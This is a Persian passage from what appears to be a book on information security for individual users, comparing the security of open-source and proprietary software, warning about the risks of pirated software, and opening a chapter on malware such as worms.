‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﻧﺎﮔﻬﺎﻥ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺭﺍﺋﻪ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺁﻥ‬
‫ﻗﻄﻊ ﺷﻮﺩ ﻭ ﻳﺎ ﺗﻮﺍﻧﺎﻳﻲ ﺧﺮﻳـﺪ ﺁﻧـﺮﺍ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ‪ .‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺑﺮﺧﻲ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﺎﻧﻨﺪ ﻭﻳﺮﻭﺱ ﻳﺎﺑﻬﺎ ﺍﮔﺮ ﺑﻄﻮﺭ ﻣﻨﻈﻢ )ﺭﻭﺯﺍﻧـﻪ ﻳـﺎ‬
‫ﻫﻔﺘﮕﻲ( ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺸﻮﻧﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺧﻄﺮﻧﺎﻛﺘﺮ ﺍﺯ ﺣـﺎﻟﺘﻲ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﺷـﻮﺩ؛ ﺯﻳـﺮﺍ ﺍﮔـﺮ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﻤﺎﻳﻴﺪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﺷﺮﺍﻳﻂ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻳﺪ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ‬
‫ﺁﺧﺮﻳﻦ ﻧﻜﺘﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﻛﻤﻲ ﺑﺤﺚ ﻣـﻲﻃﻠﺒـﺪ‪.‬‬
‫ﻣﺒﺎﺣﺜـﻪﺍﻱ ﻣﻴـﺎﻥ ﻃﺮﻓـﺪﺍﺭﺍﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻣـﺘﻦﺑـﺎﺯ ﻭ ﻃﺮﻓــﺪﺍﺭﺍﻥ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺳﻨﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻻﺧﺮﻩ ﻛـﺪﺍﻣﻴﻚ‬
‫ﺍﺯ ﺍﻳﻦ ﻣﺤﺼﻮﻻﺕ ﺍﻳﻤﻦﺗﺮ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻃﺮﻓﺪﺍﺭﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﻣﻌﺘﻘﺪﻧﺪ‪:‬‬
‫•‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻣﺤﺼﻮﻻﺕ ﻣﺘﻦﺑﺎﺯ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﺍﺳﺖ‪ ،‬ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﻪ ﺳﺎﺩﮔﻲ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺗﺠﺰﻳﻪ ﻭ‬
‫ﺗﺤﻠﻴﻞ ﻛﻨﻨـﺪ ﻭ ﺗﻤـﺎﻣﻲ ﺍﺷـﻜﺎﻻﺗﻲ ﻛـﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺁﻧﻬـﺎ‬
‫ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﻧﻔﻮﺫ ﻛﺮﺩ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫•‬
‫ﭼﻮﻥ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺩﺭ ﻣﻨـﺎﻃﻖ ﻣﺨﺘﻠـﻒ ﻭ ﺑـﺪﻭﻥ ﺭﻭﺍﺑـﻂ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﻣﺤـﺼﻮﻻﺕ ﻣـﺘﻦﺑـﺎﺯ ﻛـﺎﺭ‬
‫ﻛﻨﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ ﺷـﻮﻧﺪ ﻭ‬
‫ﻓﻘــﺪﺍﻥ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺭ ﺍﺟــﺰﺍﻱ ﻣﺨﺘﻠــﻒ ﻣﻨﺠــﺮ ﺑــﻪ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﮔﺮﺩﺩ‪.‬‬
‫•‬
‫ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﻣﺤﺼﻮﻻﺕ ﺍﻧﺤﺼﺎﺭﻱ ﺑﻪ‬
‫ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﻩ ﻭﺟــﻪ ﻣــﻲﭘﺮﺩﺍﺯﻧــﺪ‪ ،‬ﺩﺳــﺘﻮﺭﺍﺕ ﺍﻭ ﺭﺍ ﺩﻧﺒــﺎﻝ‬
‫ﻣــﻲﻛﻨﻨــﺪ ﻭ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﺑﺎﻋــﺚ ﻣــﻲﺷــﻮﺩ ﻛﻴﻔﻴــﺖ‬
‫ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺑﺎﻻ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ ﻫــﻴﭻ ﻣﻨﺒــﻊ ﻣﻌﻴﻨــﻲ ﻣــﺴﺌﻮﻟﻴﺘﻲ ﺩﺭ ﻗﺒــﺎﻝ‬
‫ﻣﺤﺼﻮﻻﺕ ﻣﺘﻦﺑﺎﺯ ﺑﺮ ﻋﻬﺪﻩ ﻧﺪﺍﺭﺩ‪ ،‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴـﺖ‬
‫ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺍﻧﻔـﺮﺍﺩﻱ ﺍﻫﻤﻴـﺖ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪،‬‬
‫ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛـﻪ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ‬
‫ﺷﻮﺩ‪.‬‬
‫‪٣٤‬‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯﻱ ﻛﻪ ﺑﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﻫـﺴﺘﻨﺪ‬
‫ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﺎﺳﺒﻲ ﻣـﻮﺭﺩ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﺩﺭ‬
‫ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺎ ﺍﻳﻨﻜﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺍﺻﻠﻲ ﺑـﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻋﺮﺿـﻪ‬
‫ﻣﻲ ﺷﻮﺩ ﺍﻣﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻳﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﺁﻥ ﻫﺰﻳﻨﻪﺑﺮ ﺑﺎﺷﺪ‪ .‬ﻧﺴﺨﺔ ﺭﺍﻳﮕـﺎﻥ ‪ Red Hat Linux‬ﻛـﻪ ﺩﺭ‬
‫ﺩﺳﺘﺮﺱ ﻋﻤـﻮﻡ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻧﻤﻮﻧـﺔ ﺧـﻮﺑﻲ ﺍﺯ ﺍﻳـﻦ ﻗﺒﻴـﻞ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺍﺳﺖ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺧﻮﺍﻫـﺎﻥ ﺳـﻄﺢ ﺑﻴـﺸﺘﺮﻱ ﺍﺯ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻫﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﺘﺔ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺻﻠﻲ ﻭ ﻳﺎ‬
‫ﺣﺪﺍﻗﻞ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﺮﺍ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻨﺪ‪ .‬ﺍﮔـﺮ ﺗـﺼﻤﻴﻢ ﺑـﻪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺩﺍﺭﻳـﺪ ﻛـﻪ ﺧﺮﻳـﺪ ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﻬـﺎ‬
‫ﺭﺍﻳﮕﺎﻥ ﺍﺳـﺖ )ﻣﺜـﻞ ﺑﻌـﻀﻲ ﺍﺯ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻭ ﻣـﺘﻦﺑـﺎﺯ( ﺗﻮﺟـﻪ‬
‫ﺩﺍﺷﺘﻪﺑﺎﺷﻴﺪ ﻛﻪ ﻣـﺪﺕﺯﻣـﺎﻥ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﺍﺻــﻼﺣﻲ ﺁﻧﻬــﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﻛﻮﺗــﺎﻩ ﺑﺎﺷــﺪ‪ .‬ﺑﻨــﺎﺑﺮﺍﻳﻦ ﺍﮔــﺮ‬
‫ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻳــﺎ ﺯﻳﺮﺳﻴــﺴﺘﻤﻬﺎﻱ ﻣﻬــﻢ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﻧــﻮﻉ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺪﻭﻥ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﺟﺪﻳﺪ‬
‫ﺁﻧﺮﺍ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ )ﻣﺜ ﹰﻼ ﺩﺭ ﻫﺮ ﺷﺶ ﻣﺎﻩ( ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ‪.‬‬
‫ﺭﻭﻧــﺪ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻣﺤــﺼﻮﻻﺕ ﻣــﺘﻦﺑــﺎﺯ ﺑــﺴﻴﺎﺭ ﻣــﺸﻜﻠﺘﺮ ﺍﺯ‬
‫ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻣﺤــﺼﻮﻻﺗﻲ ﻣﺜــﻞ ‪Microsoft Windows‬‬
‫ﺍﺳﺖ؛ ﺍﻣﺎ ﺑﺎ ﻭﺟﻮﺩ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻧـﺼﺐ ﺑـﺮﺍﻱ ﻣﺤـﺼﻮﻻﺕ‬
‫ﺍﺻﻠﻲ ﻣﺘﻦﺑﺎﺯ ﺍﻳﻦ ﻣﺸﻜﻞ ﻫﻢ ﺑﺮﻃﺮﻑ ﻣﻲﺷﻮﺩ‪ .‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﻣﺘﻦﺑﺎﺯ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows‬ﻧﻴﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ‬
‫ﻛﺎﻣﭙﺎﻳﻞﺷﺪﻩ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺯ ﻧﺼﺐﻛﻨﻨﺪﻩﻫﺎﻱ ﺳﺎﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻫﻤﺎﻧﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ ،Windows‬ﺑﺴﺘﻪ ﻫـﺎﻱ ﺑـﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ﻭ‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺑﺰﺭﮒ‪ ،‬ﺑﺴﺘﻪ ﺑـﻪ‬
‫ﺍﻧﺪﺍﺯﺓ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺷﻨﺎﺳﺎﻳﻲ ﻣﻨﺎﺑﻊ ﻣﺤﻠﻲ‬
‫ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﻤﻨﻈﻮﺭ ﻛﺎﻫﺶ ﺯﻣﺎﻥ ‪download‬‬
‫ﺁﻧﻬﺎ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪.‬‬
‫‪Open Source Software‬‬
‫‪34‬‬
‫ﻃﺮﻓﺪﺍﺭﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﻣﻌﺘﻘﺪﻧﺪ‪:‬‬
‫•‬
‫ﺑﻪ ﺩﻟﻴﻞ ﺍﻳﻨﻜﻪ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺑﺎ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻛﺎﺭ‬
‫ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻣﺴﺎﺋﻞ ﻭ ﻣﺸﻜﻼﺕ ﺁﻧﻬـﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ ﺧﺒـﺮﻩ‬
‫ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺳﺮﻳﻌﹰﺎ ﺍﺻﻼﺡ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫•‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﻣﺤﺼﻮﻻﺕ ﺍﻧﺤﺼﺎﺭﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﻛﺪ ﻳﻜﭙﺎﺭﭼﻪ ﺍﻱ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﮔﺮ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﻩ‬
‫ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻣﺤﺼﻮﻝ ﺧﻮﺩ ﺍﺭﺯﺵ ﺧﺎﺻـﻲ ﻗﺎﺋـﻞ ﻧـﺸﺪﻩ‬
‫ﺑﺎﺷﺪ ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻄﺢ ﺍﻳﻤﻨﻲ ﻣﻄﻠﻮﺑﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ‬
‫ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺑﺮﺍﻱ ﺍﺻﻼﺡ ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ‬
‫ﻫﻤﻴﺸﻪ ﺑﺎﻳﺪ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻣﺤﺼﻮﻝ ﻣﺮﺍﺟﻌﻪ ﻛﺮﺩ ﻭ ﺍﻳـﻦ‬
‫ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺯﻣﺎﻧﻲ ﺯﻳﺎﺩﻱ ﺷﻮﺩ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫‪٦٩‬‬
‫ﺩﺭ ﻭﺍﻗﻊ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﺩﻻﻳﻞ ﺩﺭ ﺟﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺻـﺤﻴﺢ ﻫـﺴﺘﻨﺪ‪.‬‬
‫ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﻧﺤﺼﺎﺭﻱ ﻳﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺩﻋﺎ ﻛـﺮﺩ ﻛـﻪ‬
‫ﻛﺸﻒ ﻭ ﺍﺻﻼﺡ ﻣﺸﻜﻼﺕ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺩﺭ ﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﺻﻮﺭﺕ‬
‫ﻣﻲﮔﻴﺮﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺩﺭ ﻫﺮ ﺩﻭ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﻧﻤﻮﻧـﻪﻫـﺎﻳﻲ ﺍﺯ ﺭﻓﺘـﺎﺭ‬
‫ﺍﻳﺪﻩﺁﻝ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﻲﺩﻗﺘﻲ ﻃﺮﺍﺣﺎﻥ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺩﻳﺪﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻧﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭ ﻧﻪ ﻧﺎﺷﺮﺍﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﻫﻴﭽﻜﺪﺍﻡ ﻣﺮﻭﺝ ﺳـﺮﻗﺖ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺳﺎﺩﻩﺍﻧﮕﺎﺭﺍﻧـﻪ ﺍﺳـﺖ ﺍﮔـﺮ ﻭﺍﻧﻤـﻮﺩ ﻛﻨـﻴﻢ‬
‫ﭼﻨﻴﻦ ﻣﺴﺌﻠﻪﺍﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺳﺮﻗﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺸﻜﻠﻲ ﺍﺳﺖ ﻛـﻪ‬
‫ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻭﻟـﻲ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﺍﺗﻔـﺎﻕ‬
‫ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﻫﺰﻳﻨﺔ ﻧﺴﺒﻲ ﺗﻬﻴﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻗـﺎﻧﻮﻧﻲ ﺩﺭ‬
‫ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺩﺳﺘﻤﺰﺩﻫﺎ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ‬
‫ﺍﺳﺖ ‪ -‬ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺩﻭﺍﻳﺮ ﻗﻮﺍﻧﻴﻦ ﻣﺤﻠﻲ ﻭ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺑـﺎ‬
‫ﻫﻤﻜﺎﺭﻱ ﻫﻢ ﺍﻧﺠﺎﻡ ﺗﺨﻠﻔﺎﺕ ﺭﺍ ﺑﺴﻴﺎﺭ ﻏﻴﺮ ﻣﺤﺘﻤﻞ ﻣﻲﺳﺎﺯﻧﺪ‪.‬‬
‫ﮔﺬﺷﺘﻪ ﺍﺯ ﻭﻇﻴﻔﺔ ﻗﺎﻧﻮﻧﻲ ﻣﺴﺌﻮﻟﻴﻦ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺧﺪﺷـﻪﺩﺍﺭ‬
‫ﺷﺪﻥ ﺣﻘﻮﻕ ﻣﺎﻟﻜﻴﺖ ﺳﺎﺯﻧﺪﺓ ﻣﺤﺼﻮﻝ‪ ،‬ﺩﻭ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺴﺮﻭﻗﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ‪.‬‬
‫ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺩﻭ ﻣﻮﺭﺩ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ ﭼﻨﺪﺍﻥ ﺭﺍﻳﺞ‬
‫ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻫﺮ ﺩﻭ ﺑﺎ ﻫـﻢ‬
‫ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪.۱‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺴﺮﻭﻗﻪ ﻗﺎﺑﻞ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺷـﺪﻥ‬
‫ﻧﺒﺎﺷﺪ ﻳﺎ ﺍﻧﺠﺎﻡ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻧﺮﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﻨﺪﺍﺯﺩ‪.‬‬
‫‪.۲‬‬
‫ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺑﺮﺧـﻲ ﺍﺯ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻫـﺎﻱ ﻣـﺴﺮﻭﻗﻪ ﺣـﺎﻭﻱ‬
‫ﻛﺎﺭﻛﺮﺩﻫــﺎﻳﻲ ﺑﺎﺷــﻨﺪ ﻛــﻪ ﺍﻧﺘﻈــﺎﺭ ﺁﻧﻬــﺎ ﺭﺍ ﻧﺪﺍﺭﻳــﺪ‪ .‬ﺍﻳــﻦ‬
‫ﻛﺎﺭﻛﺮﺩﻫــﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺷــﺎﻣﻞ ﺩﺭﺑﻬــﺎﻱ ﻣﺨﻔــﻲ‪،‬‬
‫ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﻣﺨﺮﺏ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪Pirated Software‬‬
‫‪35‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ‬
‫‪٣٥‬‬
‫‪٧١‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﻓﺼﻞ ﭘﻨﺠﻢ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﻣﻔﻬﻮﻡ ﻭ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ )ﻧﻈﻴﺮ‬
‫ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻛﺮﻡﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ‪ ،‬ﻭ ﺗﺮﺍﻭﺍﻫـﺎ( ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﺗﻮﺯﻳﻊ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﻛﺮﻡ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ‬
‫ﻛﺮﻣﻬﺎ ﺍﺯ ﺍﻳﻦ ﺟﻬﺖ ﻛﻪ ﻧـﺴﺨﻪﺍﻱ ﺍﺯ ﺧـﻮﺩ ﺭﺍ‬
‫ﺗﻜﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ﻣﺸﺎﺑﻪ ﻭﻳﺮﻭﺳـﻬﺎ ﻫـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ‬
